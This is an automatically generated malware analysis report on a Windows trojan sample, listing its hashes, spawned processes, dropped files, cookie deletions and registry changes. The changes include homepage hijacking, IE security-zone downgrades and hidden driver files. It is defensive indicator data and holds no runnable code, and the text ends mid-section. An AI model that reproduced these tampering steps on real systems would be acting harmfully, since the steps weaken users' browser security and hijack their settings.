Gen.Variant.Graftor.94620_30ebd5248b

by malwarelabrobot on April 5th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Invader (Kaspersky), Gen:Variant.Graftor.94620 (AdAware), WormAutoItGen.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Worm


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 30ebd5248bf939f8574924d0cd76a554
SHA1: 2a3cadbb1580d6e49fbc1486af7f7575ee902152
SHA256: 801921336350618643de072464dd29f0f46bf2ba49535cd2d7a806dda9070af2
SSDeep: 24576:/NBI/KyLqpALIYXjEAI8LDrrAJEWXR17lP3Dk:o9qpwIYTEs EUvlvg
Size: 1049992 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-12-01 10:08:23
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nvsvc32.exe:2604
MainPro.exe:604
desk.exe:3840
ndis500.exe:2464
ping.exe:496
ping.exe:1388
YP.exe:1236
ndsqp.exe:2428
%original file name%.exe:1532
lgsoyx.exe:3824
shock.exe:3848

The Trojan injects its code into the following process(es):

MainProX.exe:600
Explorer.EXE:880

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nvsvc32.exe:2604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\clk.ini (82 bytes)
%WinDir%\run.bat (196 bytes)
%WinDir%\c4ud.dll (1753 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)

The process MainPro.exe:604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\desktop.ini (67 bytes)

The process desk.exe:3840 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXUVKHUF\190[1].ico (5930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\EL03V57J\178[1].ico (3595 bytes)
%WinDir%\Ymb\deskico\cfg.ini (275 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O6JANU0T\184[1].ico (6341 bytes)
%Documents and Settings%\%current user%\Desktop\»ð±¬ÓÎÏ·.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\ÆåÅÆ´óÌü.lnk (1 bytes)
%WinDir%\Ymb\deskico\184.ico (5882 bytes)
%WinDir%\Ymb\deskico\178.ico (2390 bytes)
%Documents and Settings%\%current user%\Desktop\´«Ææ°ÔÒµ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KHIRGNID\cfg[1].ini (275 bytes)
%WinDir%\Ymb\deskico\190.ico (5882 bytes)

The process ndis500.exe:2464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\drivers\uniconfi.dat (4447 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (491 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (180 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)

The Trojan deletes the following file(s):

%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%System%\drivers\uniconfi.dat (0 bytes)

The process YP.exe:1236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Ymb\sys32\shock.exe (1493 bytes)
%System%\tl.dat (8 bytes)
%System%\bc.dat (1784 bytes)
%System%\tl.txt (388 bytes)
%System%\safe.dat (3780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hfftcbc.txt (601 bytes)
%WinDir%\Ymb\sys32\shock.txt (36452 bytes)
%WinDir%\Ymb\sys32\ndis500.txt (43108 bytes)
%WinDir%\Ymb\sys32\tray.txt (144098 bytes)
%WinDir%\Ymb\wow64\nvsvc32.txt (132327 bytes)
%WinDir%\Ymb\wow64\nvsvc32.exe (7715 bytes)
%WinDir%\Ymb\sys32\ndis500.exe (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vcnpoku.txt (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\suqpotb.txt (2321 bytes)
%System%\bc.txt (85868 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qxoxvnm.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ognbetd.txt (7345 bytes)
%WinDir%\Ymb\sys32\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sgotxct.txt (7547 bytes)
%WinDir%\Ymb\sys32\urlnav.txt (14076 bytes)
%WinDir%\Ymb\First.txt (18796 bytes)
%WinDir%\Ymb\sys32\ndsqp.txt (12588 bytes)
%WinDir%\Ymb\sys32\urlnav.dll (83 bytes)
%WinDir%\Ymb\lgsoyx.exe (110 bytes)
%WinDir%\Ymb\deskico\desk.exe (299 bytes)
%WinDir%\Ymb\deskico\desk.txt (50796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mopdaqf.txt (4545 bytes)
%System%\safe.txt (122772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmifumt.txt (2105 bytes)
%WinDir%\Ymb\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gktmoij.txt (11 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (63836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\wohbhrb.txt (673 bytes)

The process ndsqp.exe:2428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\drivers\uniconfi.dat (8 bytes)
%WinDir%\Ymb\sys32\ndisweb.log (142 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (5 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (8 bytes)

The Trojan deletes the following file(s):

%WinDir%\ax01.da0 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat1 (0 bytes)
%WinDir%\Ymb\sys32\ndisweb_new.dat0 (0 bytes)

The process %original file name%.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\jwxf\start.bat (99 bytes)
%WinDir%\jwxf\yp.exe (5033 bytes)
%WinDir%\jwxf\MainProX.exe (1660 bytes)
%WinDir%\jwxf\userip.ipb (936 bytes)
%WinDir%\jwxf\MainPro.exe (18513 bytes)

The Trojan deletes the following file(s):

%WinDir%\jwxf\__tmp_rar_sfx_access_check_1215828 (0 bytes)

The process shock.exe:3848 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Ymb\sys32\shock.dll (931 bytes)

Registry activity

The process nvsvc32.exe:2604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 88 7E 8E 2A B1 89 90 B7 C0 10 E6 23 84 4F E4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]

The process MainPro.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 24 91 72 F9 3D AC 19 17 17 80 C6 18 67 0D C1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"MicroAvd"

The process desk.exe:3840 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnHTTPSToHTTPRedirect" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 01 C7 41 95 5F 3E 03 36 3C 0D 64 27 3F F0 C6"

[HKCR\DeskIcon]
"(Default)" = "1000_7959"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ndis500.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 A6 E3 93 65 77 35 D2 A6 8E A8 2A E5 06 0A C2"

The process ping.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CF 82 14 14 8F 43 3B 31 DE 58 30 AF E3 CC B3 C0"

The process ping.exe:1388 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 9C 96 6D E4 F8 59 78 F8 EB 6F 6C E8 DE 81 11"

The process MainProX.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 42 B8 19 EF A9 FA C9 A6 20 CC 25 93 DB D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://123.sogou.com/?71084-9278"
"Search Page" = "http://123.sogou.com/?71084-9278"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://123.sogou.com/?71084-9278"

The process YP.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC E8 51 1F 1F 3F 45 A4 EF C9 06 73 8A B3 2A 77"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process ndsqp.exe:2428 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4F 54 F1 DA CF 13 32 D6 ED 49 8C E8 4F 5A 90 B6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\ZWebNds\Enum]
[HKLM\System\CurrentControlSet\Services\ZWebNds\Security]
[HKLM\System\CurrentControlSet\Services\ZWebNds]

The process %original file name%.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 6A 4E 88 BE 58 91 12 29 00 09 17 5E BD C9 B7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\WinRAR SFX]
"c%%windows%jwxf" = "c:\windows\jwxf"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\jwxf]
"start.bat" = "start"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process lgsoyx.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

